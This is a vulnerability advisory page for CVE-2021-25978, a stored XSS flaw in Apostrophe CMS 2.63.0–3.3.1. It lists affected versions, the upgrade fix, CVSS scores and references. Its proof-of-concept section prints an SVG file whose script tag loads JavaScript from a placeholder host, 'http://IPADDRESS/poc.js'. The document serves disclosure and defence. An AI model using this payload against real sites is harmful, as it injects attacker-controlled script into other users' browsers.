Home > Vulnerability Database > CVE-2021-25978

Mend.io Vulnerability Database

CVE-2021-25978

Date: November 7, 2021

Overview

Apostrophe CMS versions between 2.63.0 to 3.3.1 are vulnerable to Stored XSS where an editor uploads an SVG file that contains malicious JavaScript onto the Images module, which triggers XSS once viewed.

Details

Apostrophe CMS versions between 2.63.0 to 3.3.1 are vulnerable to Stored XSS where an editor uploads an SVG file that contains malicious JavaScript onto the Images module, Stored XSS enables self-contained attacks within the application. An attacker doesn't need to find an way of inducing users to make a particular request containing their exploit.

PoC Details

Navigate to the "Images" tab and upload the malicious svg file.
Run a simple HTTP server with content in “poc.js” file as “alert(“XSS”);”

PoC Code

<svg xmlns="http://www.url.org/2000/svg"
xmlns:xlink="http://www.url.org/1999/xlink">
<script type="text/javascript" href="http://IPADDRESS/poc.js"></script>
</svg>

Affected Environments

2.63.0-3.3.1

Prevention

Upgrade to version 3.4.0

Language: JS

Good to know:

5.4

Cross-Site Scripting (XSS)

CWE-79

Upgrade Version

Upgrade to version apostrophe - 3.4.0

Learn More

CVSS v3.1
CVSS v2

Base Score:	5.4
Attack Vector (AV):	Network
Attack Complexity (AC):	Low
Privileges Required (PR):	Low
User Interaction (UI):	Required
Scope (S):	Changed
Confidentiality (C):	Low
Integrity (I):	Low
Availability (A):	None

Base Score:	3.5
Access Vector (AV):	Network
Access Complexity (AC):	Medium
Authentication (AU):	Single
Confidentiality (C):	None
Integrity (I):	Partial
Availability (A):	None
Additional information:

Related Resources (3)

Url: https://github.com/apostrophecms/apostrophe/commit/c8b94ee9c79468f1ce28e31966cb0e0839165e59

Url: https://nvd.nist.gov/vuln/detail/CVE-2021-25978

Url: https://www.mend.io/vulnerability-database/CVE-2021-25978